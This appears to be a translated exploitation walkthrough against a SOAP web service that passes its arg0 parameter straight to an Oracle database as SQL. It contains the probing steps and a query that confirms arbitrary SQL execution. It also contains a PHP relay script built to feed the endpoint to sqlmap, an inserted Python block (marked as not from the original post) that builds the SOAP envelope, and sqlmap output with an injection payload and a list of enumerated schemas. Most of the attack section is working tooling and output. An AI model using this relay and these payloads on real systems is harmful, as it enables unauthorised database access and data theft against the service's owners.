Start with a local instance:
http://localhost:8088/ws
Code:
http://localhost:8088/ws/query?wsdl
Surprisingly, it returned:
Code:
Unmarshalling Error: unexpected element (uri:"http://**.**.**.**/", local:"arg0"). Expected elements are <{}arg1>,<{}arg0>
Searching for the message shows it is a parameter problem: the endpoint expects the two operands as unqualified <arg0> and <arg1> elements. We obviously can't change the service code, so change the parameters instead.
ORA-00900: invalid SQL statement
So the parameter reaches the database as is. Change the first parameter to:
Code:
select SYS_CONTEXT('USERENV','CURRENT_USER') from dual
Check the current user.
Arbitrary SQL execution.
Next, relay it through a script:
Code:
<?php
// Relay: takes the SQL statement from ?sql= and hands it to the SOAP
// operation queryBy as arg0, so sqlmap can treat "sql" as a normal GET parameter.
$arg0 = isset($_GET['sql']) ? $_GET['sql'] : '';
header("content-type:text/html;charset=utf-8");
try {
    $client = new SoapClient('http://localhost:8088/ws/query?wsdl');
    // arg0 is the statement executed by the backend, arg1 is a fixed second operand
    $result = $client->queryBy(array('arg0' => $arg0, 'arg1' => '1'));
    echo $result->return; // show the query result
} catch (SoapFault $e) {
    // SOAP faults carry the Oracle error text, e.g. ORA-00900
    print_r('Exception:' . $e);
}
?>
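The PHP relay hides the actual SOAP envelope inside SoapClient. The following is an added example, not code from the original post, that builds the same queryBy call by hand in Python and pulls either the result or the Oracle error out of the reply. The unmarshalling error quoted above ("Expected elements are <{}arg1>,<{}arg0>") is the key detail: the JAX-WS endpoint wants arg0 and arg1 as children with no namespace, while the wrapper element itself sits in the service namespace. The service namespace, the unqualified <return> element and the sample replies are assumptions, since the WSDL is not reproduced on the page.

```python
import urllib.request
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
# Assumed service namespace; take the real one from the targetNamespace in the WSDL.
SERVICE_NS = "http://service.example.invalid/"


def build_query_envelope(sql, arg1="1", service_ns=SERVICE_NS):
    """SOAP 1.1 request for queryBy(arg0, arg1).

    arg0 and arg1 are emitted without a namespace, which is what the
    "Expected elements are <{}arg1>,<{}arg0>" error asks for. Prefixing them
    with the service namespace is exactly what triggers that error.
    """
    ET.register_namespace("soapenv", SOAP_ENV)
    ET.register_namespace("ser", service_ns)
    env = ET.Element("{%s}Envelope" % SOAP_ENV)
    ET.SubElement(env, "{%s}Header" % SOAP_ENV)
    body = ET.SubElement(env, "{%s}Body" % SOAP_ENV)
    op = ET.SubElement(body, "{%s}queryBy" % service_ns)  # wrapper is qualified
    ET.SubElement(op, "arg0").text = sql                   # {}arg0: no namespace
    ET.SubElement(op, "arg1").text = arg1                  # {}arg1: no namespace
    return ET.tostring(env, encoding="unicode")


def _local(tag):
    """Strip the {namespace} part of an ElementTree tag."""
    return tag.rsplit("}", 1)[-1]


def parse_query_response(xml_text):
    """Return the text of the <return> element, or None if absent."""
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if _local(el.tag) == "return":
            return el.text
    return None


def soap_fault_string(xml_text):
    """Return the <faultstring> of a SOAP Fault (e.g. the ORA-xxxxx text), or None."""
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if _local(el.tag) == "faultstring":
            return el.text
    return None


def send_query(sql, url="http://localhost:8088/ws/query"):
    """Post the envelope to the endpoint (network; not exercised offline)."""
    data = build_query_envelope(sql).encode("utf-8")
    req = urllib.request.Request(url, data=data, headers={
        "Content-Type": "text/xml; charset=utf-8",
        "SOAPAction": '""',
    })
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode("utf-8")


# Constructed sample replies, shaped like typical JAX-WS output (assumption).
SAMPLE_RESPONSE = (
    '<S:Envelope xmlns:S="%s"><S:Body>'
    '<ns2:queryByResponse xmlns:ns2="%s"><return>DEMO_USER</return>'
    '</ns2:queryByResponse></S:Body></S:Envelope>' % (SOAP_ENV, SERVICE_NS)
)
SAMPLE_FAULT = (
    '<S:Envelope xmlns:S="%s"><S:Body><S:Fault>'
    '<faultcode>S:Server</faultcode>'
    '<faultstring>ORA-00900: invalid SQL statement</faultstring>'
    '</S:Fault></S:Body></S:Envelope>' % SOAP_ENV
)

if __name__ == "__main__":
    print(build_query_envelope("select SYS_CONTEXT('USERENV','CURRENT_USER') from dual"))
    print(parse_query_response(SAMPLE_RESPONSE))
    print(soap_fault_string(SAMPLE_FAULT))
```

The envelope builder is what you would feed to sqlmap's --data option with the statement position marked, instead of going through a PHP relay; the fault parser is how the relay's "Exception:" output maps back to the Oracle error that proved arg0 is executed verbatim.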
SQL injection
Code:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: sql
Type: inline query
Title: Oracle inline queries
Payload: sql=(SELECT CHR(113)||CHR(115)||CHR(112)||CHR(99)||CHR(113)||(SELECT (CASE WHEN (8499=8499) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(101)||CHR(112)||CHR(97)||CHR(113) FROM DUAL)
---
[15:39:49] [INFO] the back-end DBMS is Oracle
web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: Oracle
Code:
available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB